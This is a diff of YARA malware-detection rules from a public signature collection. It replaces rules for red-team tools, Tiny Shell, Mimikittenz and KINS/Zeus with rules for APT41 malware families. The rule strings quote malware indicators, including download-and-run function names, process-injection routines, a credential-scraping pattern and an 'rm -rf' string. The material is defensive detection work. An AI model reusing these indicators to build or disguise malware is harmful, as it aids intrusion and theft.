-		reference = "https://github.com/QAX-A-Team/PandaSniper"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L781-L794"
+		description = "Detects APT41 malware POISONPLUG SHADOW"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e150dd69-c611-53de-9c7d-de28d3a208dc"
+		date = "2019-08-07"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L33-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c5a32f22a429777186d88f3fcfa79ad4d971e86ebd6117df74aae19728c6addd"
-		score = 75
+		logic_hash = "fc923c7e85f3870e08a077b344e575d3c349fa02f3d218a9a7ec31992f14866b"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$name = "PandaSniper" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		hash1 = "462a02a8094e833fd456baf0a6d4e18bb7dab1a9f74d5f163a8334921a4ffde8"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and pe.imphash ( ) == "c67de089f2009b21715744762fc484e8"
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Xbapappwhitelistbypasspoc : FILE
+rule SIGNATURE_BASE_APT_APT41_CRACKSHOT : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "b05253ce-cba4-531d-8f39-d8fae71b114d"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/jpginc/xbapAppWhitelistBypassPOC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L796-L809"
+		description = "Detects APT41 malware CRACKSHOT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4ec34a77-dc7f-5f27-9f0a-c98438389018"
+		date = "2019-08-07"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L46-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3c79b70d3a72084dff391ba297518c4fe748d35b794278c4edf2d1faa4bd216e"
-		score = 75
+		logic_hash = "70dd9edfc7f9ace7b00a35eb2ef664aa4fbaab8e2d268922d1593074897e769c"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "993d14d00b1463519fea78ca65d8529663f487cd76b67b3fd35440bcdf7a8e31"
 
 	strings:
-		$name = "xbapAppWhitelistBypassPOC" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$x1 = ";procmon64.exe;netmon.exe;tcpview.exe;MiniSniffer.exe;smsniff.exe" ascii
+		$s1 = "RunUrlBinInMem" fullword ascii
+		$s2 = "DownRunUrlFile" fullword ascii
+		$s3 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36" fullword ascii
+		$s4 = "%s|%s|%s|%s|%s|%s|%s|%dx%d|%04x|%08X|%s|%s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Stagestrike : FILE
+rule SIGNATURE_BASE_APT_APT41_POISONPLUG_2 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "e3f9de04-87f6-5b07-b5b0-a26167937fcc"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/RedXRanger/StageStrike"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L811-L824"
+		description = "Detects APT41 malware POISONPLUG"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e150dd69-c611-53de-9c7d-de28d3a208dc"
+		date = "2019-08-07"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L66-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "99abc2fee732f27ea94c8ce244dc1742ed01a7753adedd7e80226d1e1c8dee4a"
-		score = 75
+		logic_hash = "f2ec2e91edaaf976169b1fa6645aeae75135e5d5f522e0fda2438f84d674f383"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0055dfaccc952c99b1171ce431a02abfce5c6f8fb5dc39e4019b624a7d03bfcb"
 
 	strings:
-		$name = "StageStrike" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$s1 = "ma_lockdown_service.dll" fullword wide
+		$s2 = "acbde.dll" fullword ascii
+		$s3 = "MA lockdown Service" fullword wide
+		$s4 = "McAfee Agent" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 11000KB and all of them
 }
-rule SIGNATURE_BASE_Gen_Excel_Auto_Open_Evasion : FILE
+
+rule SIGNATURE_BASE_APT_APT41_POISONPLUG : FILE
 {
 	meta:
-		description = "Detects an obfuscated Auto_Open cell names in Excel files"
-		author = "@JohnLaTwC"
-		id = "e33b8d1d-4978-5747-8b5b-730e6c57dbf0"
-		date = "2020-09-24"
+		description = "Detects APT41 malware POISONPLUG"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e150dd69-c611-53de-9c7d-de28d3a208dc"
+		date = "2019-08-07"
 		modified = "2023-12-05"
-		reference = "https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_excel_auto_open_evasion.yar#L1-L26"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L84-L106"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e23f9f55e10f3f31a2e76a12b174b6741a2fa1f51cf23dbd69cf169d92c56ed5"
-		logic_hash = "d7d81683b9abd7b89d6d6ee4d14ff37359acd353a6bd1d88bc793525c8f203d9"
-		score = 70
-		quality = 83
+		logic_hash = "34459c2a8a13b8084c93a640723a3e2b67d2f695ff84ab63f4e313cacc458f32"
+		score = 80
+		quality = 85
 		tags = "FILE"
-		hash1 = "bb3c9739de8ffe2e0f375847d41a010463ec19f1d3f578ac053651a51ed69bbc"
-		hash2 = "56ff65b7f6bf5936883f52b50ca66e768b2088158cc77af681ffab7122be7753"
-		hash3 = "97243214ac3cad74d60b0648e39d6a9600860edba51c670b5226e058ba658957"
-		hash4 = "9ebf085c05ae94c1b6c4e011001a6c11de3ca754a56ed380314ef501b777e593"
-		hash5 = "b5a8bbf3c7d49bd208d8302f6867b5f6d3d7c09830b575967801893498cc92d9"
+		hash1 = "2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd"
+		hash2 = "5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90"
+		hash3 = "f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661"
+		hash4 = "3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f"
 
 	strings:
-		$auto_open = { 00 00 00 00 01 [0-2] (61 | 41) [0-5](75 | 55) [0-5](74 | 54) [0-5](6f | 4f) [0-5](5f | 5f) [0-5](6f | 4f) [0-5](70 | 50) [0-5](65 | 45) [0-5](6e | 4e)}
-		$plain_auto_open = "auto_open" nocase wide ascii
+		$s1 = "TSMSISrv.DLL" fullword wide
+		$s2 = "[-]write failed[%d]" fullword ascii
+		$s3 = "[-]load failed" fullword ascii
+		$s4 = "Remote Desktop Services" fullword wide
 
 	condition:
-		filesize < 1MB and uint32be( 0 ) == 0xD0CF11E0 and $auto_open and #plain_auto_open == 0
+		uint16( 0 ) == 0x5a4d and filesize < 10000KB and ( pe.imphash ( ) == "1b074ef7a1c0888ef31337c8ad2f2e0a" or 2 of them )
 }
-rule SIGNATURE_BASE_EXT_HKTL_MAL_Tinyshell_Backdoor : FILE
+rule SIGNATURE_BASE_APT_APT41_HIGHNOON : FILE
 {
 	meta:
-		description = "Detects Tiny Shell - an open-source UNIX backdoor"
-		author = "Mandiant"
-		id = "69bce2ec-a9af-5656-9a16-0cddb8b0820e"
-		date = "2022-03-17"
-		modified = "2026-01-30"
-		reference = "https://www.mandiant.com/resources/blog/unc2891-overview"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc2891_tinyshell_slapstick.yar#L1-L28"
+		description = "Detects APT41 malware HIGHNOON"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6611fb04-7237-52d1-b29f-941c3853aeca"
+		date = "2019-08-07"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L108-L135"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1fe9def11dced638ad38236652877427b61d7138fc8c6ce3fe7f1403c367468f"
-		score = 80
+		logic_hash = "c8afa91f90157c3ac0f7954cd2d42022392c4e6f039d88d1dd4bace19028c2b1"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		hash1 = "1f889871263bd6cdad8f3d4d5fc58b4a32669b944d3ed0860730374bb87d730a"
+		hash1 = "63e8ed9692810d562adb80f27bb1aeaf48849e468bf5fd157bc83ca83139b6d7"
+		hash2 = "4aa6970cac04ace4a930de67d4c18106cf4004ba66670cfcdaa77a4c4821a213"
 
 	strings:
-		$sb1 = { C6 00 48 C6 4? ?? 49 C6 4? ?? 49 C6 4? ?? 4C C6 4? ?? 53 C6 4? ?? 45 C6 4? ?? 54 C6 4? ?? 3D C6 4? ?? 46 C6 4? ?? 00 }
-		$sb2 = { C6 00 54 C6 4? ?? 4D C6 4? ?? 45 C6 4? ?? 3D C6 4? ?? 52 }
-		$ss1 = "fork" ascii fullword wide
-		$ss2 = "socket" ascii fullword wide
-		$ss3 = "bind" ascii fullword wide
-		$ss4 = "listen" ascii fullword wide
-		$ss5 = "accept" ascii fullword wide
-		$ss6 = "alarm" ascii fullword wide
-		$ss7 = "shutdown" ascii fullword wide
-		$ss8 = "creat" ascii fullword wide
-		$ss9 = "write" ascii fullword wide
-		$ss10 = "open" ascii fullword wide
-		$ss11 = "read" ascii fullword wide
-		$ss12 = "execl" ascii fullword wide
-		$ss13 = "gethostbyname" ascii fullword wide
-		$ss14 = "connect" ascii fullword wide
+		$x1 = "workdll64.dll" fullword ascii
+		$s1 = "\\Fonts\\Error.log" ascii
+		$s2 = "[%d/%d/%d/%d:%d:%d]" fullword ascii
+		$s3 = "work_end" fullword ascii
+		$s4 = "work_start" fullword ascii
+		$s5 = "\\svchost.exe" ascii
+		$s6 = "LoadAppInit_DLLs" fullword ascii
+		$s7 = "netsvcs" fullword ascii
+		$s8 = "HookAPIs ...PID %d " fullword ascii
+		$s9 = "SOFTWARE\\Microsoft\\HTMLHelp" fullword ascii
+		$s0 = "DllMain_mem" fullword ascii
+		$s10 = "%s\\NtKlRes.dat" fullword ascii
+		$s11 = "Global\\%s-%d" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and 1 of ( $sb* ) and 10 of ( $ss* )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_EXT_HKTL_MAL_Tinyshell_Backdoor_SPARC : FILE
+
+rule SIGNATURE_BASE_APT_APT41_HIGHNOON_2 : FILE
 {
 	meta:
-		description = "Detects Tiny Shell variant for SPARC - an open-source UNIX backdoor"
-		author = "Mandiant"
-		id = "332c0c16-e94c-5f09-9e26-a94601b75453"
-		date = "2022-03-17"
-		modified = "2026-01-30"
-		reference = "https://www.mandiant.com/resources/blog/unc2891-overview"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc2891_tinyshell_slapstick.yar#L30-L42"
+		description = "Detects APT41 malware HIGHNOON"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1e48d859-2da9-583e-80e5-8d59054cfb85"
+		date = "2019-08-07"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L137-L157"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cda78e26c2e274d24d1e4656fcd09af2930f43af7fac01a3f410a5692d79a5ae"
-		score = 80
+		logic_hash = "dc35b78df1631b1c9650de2bac625a7bc629225f36fe5e32fbff829cb77dc9ac"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "79190925bd1c3fae65b0d11db40ac8e61fb9326ccfed9b7e09084b891089602d"
 
 	strings:
-		$sb_xor_1 = { DA 0A 80 0C 82 18 40 0D C2 2A 00 0B 96 02 E0 01 98 03 20 01 82 1B 20 04 80 A0 00 01 82 60 20 00 98 0B 00 01 C2 4A 00 0B 80 A0 60 00 32 BF FF F5 C2 0A 00 0B 81 C3 E0 08 }
-		$sb_xor_2 = { C6 4A 00 00 80 A0 E0 00 02 40 00 0B C8 0A 00 00 85 38 60 00 C4 09 40 02 84 18 80 04 C4 2A 00 00 82 00 60 01 80 A0 60 04 83 64 60 00 10 6F FF F5 90 02 20 01 81 C3 E0 08 }
+		$x1 = "H:\\RBDoor\\" ascii
+		$s1 = "PlusDll.dll" fullword ascii
+		$s2 = "ShutDownEvent.dll" fullword ascii
+		$s3 = "\\svchost.exe" ascii
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( uint16( 0x10 ) & 0x0200 == 0x0200 ) and ( uint16( 0x12 ) & 0x0200 == 0x0200 ) and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "b70358b00dd0138566ac940d0da26a03" or pe.exports ( "DllMain_mem" ) or $x1 or 3 of them )
 }
-rule SIGNATURE_BASE_EXT_APT_UNC2891_SLAPSTICK : FILE
+
+rule SIGNATURE_BASE_APT_APT41_HIGHNOON_BIN : FILE
 {
 	meta:
-		description = "Detects SLAPSTICK malware used by UNC2891"
-		author = "Mandiant"
-		id = "788b259e-02cf-5265-9c13-2b5a4b937c32"
-		date = "2022-03-17"
-		modified = "2026-01-30"
-		reference = "https://www.mandiant.com/resources/blog/unc2891-overview"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc2891_tinyshell_slapstick.yar#L44-L57"
+		description = "Detects APT41 malware HIGHNOON.BIN"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c8bd62b4-b882-5c04-aace-76dd4a21a784"
+		date = "2019-08-07"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L159-L180"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b046a949dab2f38b8181782cc6ea0782d2e102c0c30bc782de74112a77c23d6e"
-		score = 80
+		logic_hash = "c6557bff952454482271d1b52fb37b2dd0471abd237449fd9c94b293ea5218b3"
+		score = 90
 		quality = 85
 		tags = "FILE"
+		hash1 = "490c3e4af829e85751a44d21b25de1781cfe4961afdef6bb5759d9451f530994"
+		hash2 = "79190925bd1c3fae65b0d11db40ac8e61fb9326ccfed9b7e09084b891089602d"
 
 	strings:
-		$ss1 = { 25 59 20 25 62 20 25 64 20 25 48 3a 25 4d 3a 25 53 20 20 20 20 00 }
-		$ss2 = { 25 2d 32 33 73 20 25 2d 32 33 73 20 25 2d 32 33 73 00 }
-		$ss3 = { 25 2d 32 33 73 20 25 2d 32 33 73 20 25 2d 32 33 73 20 25 2d 32 33 73 20 25 2d 32 33 73 20 25 73 0a 00 }
+		$s1 = "PlusDll.dll" fullword ascii
+		$s2 = "\\Device\\PORTLESS_DeviceName" wide
+		$s3 = "%s%s\\Security" fullword ascii
+		$s4 = "%s\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword ascii
+		$s5 = "%s%s\\Enum" fullword ascii
 
 	condition:
-		( uint32( 0 ) == 0x464c457f ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "b70358b00dd0138566ac940d0da26a03" or 3 of them )
 }
-rule SIGNATURE_BASE_Invoke_Mimikittenz : FILE
+rule SIGNATURE_BASE_APT_APT41_HIGHNOON_BIN_2 : FILE
 {
 	meta:
-		description = "Detects Mimikittenz - file Invoke-mimikittenz.ps1"
+		description = "Detects APT41 malware HIGHNOON.BIN"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6dcf3d0a-302b-520c-97c6-fd843c8a25b9"
-		date = "2016-07-19"
+		id = "37d6a44d-7811-5e87-84e2-b2a8b3da3124"
+		date = "2019-08-07"
 		modified = "2023-12-05"
-		reference = "https://github.com/putterpanda/mimikittenz"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mimikittenz.yar#L10-L29"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L182-L200"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f0410a0290d09d3574854b55ffe578f6f799368e14677b581cd65d18700a8656"
-		score = 90
+		logic_hash = "1e3d622b4719962f59d95dbf1374c526c22461dd1d9313504f28e8e5c9184272"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a"
+		hash1 = "63e8ed9692810d562adb80f27bb1aeaf48849e468bf5fd157bc83ca83139b6d7"
+		hash2 = "c51c5bbc6f59407286276ce07f0f7ea994e76216e0abe34cbf20f1b1cbd9446d"
 
 	strings:
-		$x1 = "[mimikittenz.MemProcInspector]" ascii
-		$s1 = "PROCESS_ALL_ACCESS = PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_SET_SESSIONID | PROCESS_VM_OPERATION |" fullword ascii
-		$s2 = "IntPtr processHandle = MInterop.OpenProcess(MInterop.PROCESS_WM_READ | MInterop.PROCESS_QUERY_INFORMATION, false, process.Id);" fullword ascii
-		$s3 = "&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=" ascii
-		$s4 = "[DllImport(\"kernel32.dll\", SetLastError = true)]" fullword ascii
+		$x1 = "\\Double\\Door_wh\\" ascii
+		$x2 = "[Stone] Config --> 2k3 TCP Positive Logout." fullword ascii
+		$x3 = "\\RbDoorX64.pdb" ascii
+		$x4 = "RbDoor, Version 1.0" fullword wide
+		$x5 = "About RbDoor" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 60KB and 2 of them ) or $x1
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_KINS_Dropper
+
+rule SIGNATURE_BASE_APT_APT41_Revokedcert_Aug19_1 : FILE
 {
 	meta:
-		description = "Match protocol, process injects and windows exploit present in KINS dropper"
-		author = "AlienVault Labs aortega@alienvault.com"
-		id = "17e12685-aaad-5d83-949c-43d5aef1ef0d"
-		date = "2016-02-15"
+		description = "Detects revoked certificates used by APT41 group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f107cc42-58ec-500d-b1c3-27e9e00826aa"
+		date = "2019-08-07"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/arPhm3"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_kins_dropper.yar#L1-L26"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L202-L231"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cdab93f823e13e0c3104de8e05cb1572f83fb5294f359698092d73fc7983955b"
-		score = 75
+		logic_hash = "f78c1310f99ac1993b01f3469f2f8e0765b79b2ea17fc6e7cff4e99949ca1139"
+		score = 60
 		quality = 85
-		tags = ""
-
-	strings:
-		$n1 = "tid=%d&ta=%s-%x" fullword
-		$n2 = "fid=%d" fullword
-		$n3 = "%[^.].%[^(](%[^)])" fullword
-		$i0 = "%s [%s %d] 77 %s"
-		$i01 = "Global\\%s%x"
-		$i1 = "Inject::InjectProcessByName()"
-		$i2 = "Inject::CopyImageToProcess()"
-		$i3 = "Inject::InjectProcess()"
-		$i4 = "Inject::InjectImageToProcess()"
-		$i5 = "Drop::InjectStartThread()"
-		$uac1 = "ExploitMS10_092"
-		$uac2 = "\\globalroot\\systemroot\\system32\\tasks\\" ascii wide
-		$uac3 = "<RunLevel>HighestAvailable</RunLevel>" ascii wide
+		tags = "FILE"
 
 	condition:
-		2 of ( $n* ) and 2 of ( $i* ) and 2 of ( $uac* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "0b:72:79:06:8b:eb:15:ff:e8:06:0d:2c:56:15:3c:35" or pe.signatures [ i ] . serial == "63:66:a9:ac:97:df:4d:e1:73:66:94:3c:9b:29:1a:aa" or pe.signatures [ i ] . serial == "01:00:00:00:00:01:30:73:85:f7:02" or pe.signatures [ i ] . serial == "14:0d:2c:51:5e:8e:e9:73:9b:b5:f1:b2:63:7d:c4:78" or pe.signatures [ i ] . serial == "7b:d5:58:18:c5:97:1b:63:dc:45:cf:57:cb:eb:95:0b" or pe.signatures [ i ] . serial == "53:0c:e1:4c:81:f3:62:10:a1:68:2a:ff:17:9e:25:80" or pe.signatures [ i ] . serial == "54:c6:c1:40:6f:b4:ac:b5:d2:06:74:e9:93:92:c6:3e" or pe.signatures [ i ] . serial == "fd:f2:83:7d:ac:12:b7:bb:30:ad:05:8f:99:9e:cf:00" or pe.signatures [ i ] . serial == "18:63:79:57:5a:31:46:e2:6b:ef:c9:0a:58:0d:1b:d2" or pe.signatures [ i ] . serial == "5c:2f:97:a3:1a:bc:32:b0:8c:ac:01:00:59:8f:32:f6" or pe.signatures [ i ] . serial == "4c:0b:2e:9d:2e:f9:09:d1:52:70:d4:dd:7f:a5:a4:a5" or pe.signatures [ i ] . serial == "58:01:5a:cd:50:1f:c9:c3:44:26:4e:ac:e2:ce:57:30" or pe.signatures [ i ] . serial == "47:6b:f2:4a:4b:1e:9f:4b:c2:a6:1b:15:21:15:e1:fe" or pe.signatures [ i ] . serial == "30:d3:c1:67:26:5b:52:0c:b8:7f:25:84:4f:95:cb:04" or pe.signatures [ i ] . serial == "1e:52:bb:f5:c9:0e:c1:64:d0:5b:e0:e4:16:61:52:5f" or pe.signatures [ i ] . serial == "25:f8:78:22:de:56:d3:98:21:59:28:73:ea:09:ca:37" or pe.signatures [ i ] . serial == "67:24:34:0d:db:c7:25:2f:7f:b7:14:b8:12:a5:c0:4d" )
 }
-rule SIGNATURE_BASE_KINS_DLL_Zeus
+rule SIGNATURE_BASE_APT_APT41_CN_ELF_Speculoos_Backdoor : FILE
 {
 	meta:
-		description = "Match default bot in KINS leaked dropper, Zeus"
-		author = "AlienVault Labs aortega@alienvault.com"
-		id = "968ada06-c8a1-5053-95de-10aa484231cb"
-		date = "2016-02-15"
+		description = "Detects Speculoos Backdoor used by APT41"
+		author = "Florian Roth (Nextron Systems)"
+		id = "efe2b368-33af-5382-a5f0-0e7dd7f4dea4"
+		date = "2020-04-14"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/arPhm3"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_kins_dropper.yar#L28-L48"
+		reference = "https://unit42.paloaltonetworks.com/apt41-using-new-speculoos-backdoor-to-target-organizations-globally/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L233-L267"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bd1ebe7976d1f93856b4f8d1d62d8fff68ce6234204da9fbdc233ddbef56864d"
-		score = 75
-		quality = 60
-		tags = ""
+		logic_hash = "ee4cbbc5fc51fb24cbf6017dfb4763ac72a0b23a3b6e794b909e678ebfbabc03"
+		score = 90
+		quality = 85
+		tags = "FILE"
+		hash1 = "6943fbb194317d344ca9911b7abb11b684d3dca4c29adcbcff39291822902167"
+		hash2 = "99c5dbeb545af3ef1f0f9643449015988c4e02bf8a7164b5d6c86f67e6dc2d28"
 
 	strings:
-		$n1 = "%BOTID%" fullword
-		$n2 = "%opensocks%" fullword
-		$n3 = "%openvnc%" fullword
-		$n4 = /Global\\(s|v)_ev/ fullword
-		$s1 = "\x72\x6E\x6D\x2C\x36\x7D\x76\x77"
-		$s2 = "\x18\x04\x0F\x12\x16\x0A\x1E\x08\x5B\x11\x0F\x13"
-		$s3 = "\x39\x1F\x01\x07\x15\x19\x1A\x33\x19\x0D\x1F"
-		$s4 = "\x62\x6F\x71\x78\x63\x61\x7F\x69\x2D\x67\x79\x65"
-		$s5 = "\x6F\x69\x7F\x6B\x61\x53\x6A\x7C\x73\x6F\x71"
+		$xc1 = { 2F 70 72 69 76 61 74 65 2F 76 61 72 00 68 77 2E
+               70 68 79 73 6D 65 6D 00 68 77 2E 75 73 65 72 6D
+               65 6D 00 4E 41 2D 4E 41 2D 4E 41 2D 4E 41 2D 4E
+               41 2D 4E 41 00 6C 6F 30 00 00 00 00 25 30 32 78
+               2D 25 30 32 78 2D 25 30 32 78 2D 25 30 32 78 2D
+               25 30 32 78 2D 25 30 32 78 0A 00 72 00 4E 41 00
+               75 6E 61 6D 65 20 2D 76 }
+		$s1 = "badshell" ascii fullword
+		$s2 = "hw.physmem" ascii fullword
+		$s3 = "uname -v" ascii fullword
+		$s4 = "uname -s" ascii fullword
+		$s5 = "machdep.tsc_freq" ascii fullword
+		$s6 = "/usr/sbin/config.bak" ascii fullword
+		$s7 = "enter MessageLoop..." ascii fullword
+		$s8 = "exit StartCBProcess..." ascii fullword
+		$sc1 = { 72 6D 20 2D 72 66 20 22 25 73 22 00 2F 70 72 6F
+               63 2F }
 
 	condition:
-		all of ( $n* ) and 1 of ( $s* )
+		uint16( 0 ) == 0x457f and filesize < 600KB and 1 of ( $x* ) or 4 of them
 }
 
-rule SIGNATURE_BASE_EXT_HKTL_Nighthawk_RAT : FILE
+rule SIGNATURE_BASE_APT_ME_Bigbang_Gen_Jul18_1 : FILE
 {
 	meta:
-		description = "Detects Nighthawk RAT"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "7a58b8bf-fb14-5758-bc2a-ad2c6fff1216"
-		date = "2022-11-22"
-		modified = "2025-07-01"
-		reference = "https://www.proofpoint.com/us/blog/threat-insight/nighthawk-and-coming-pentest-tool-likely-gain-threat-actor-notice"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_nighthawk_c2.yar#L3-L30"
+		description = "Detects malware from Big Bang campaign against Palestinian authorities"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f1097998-9414-511c-b177-ff09154964a8"
+		date = "2018-07-09"
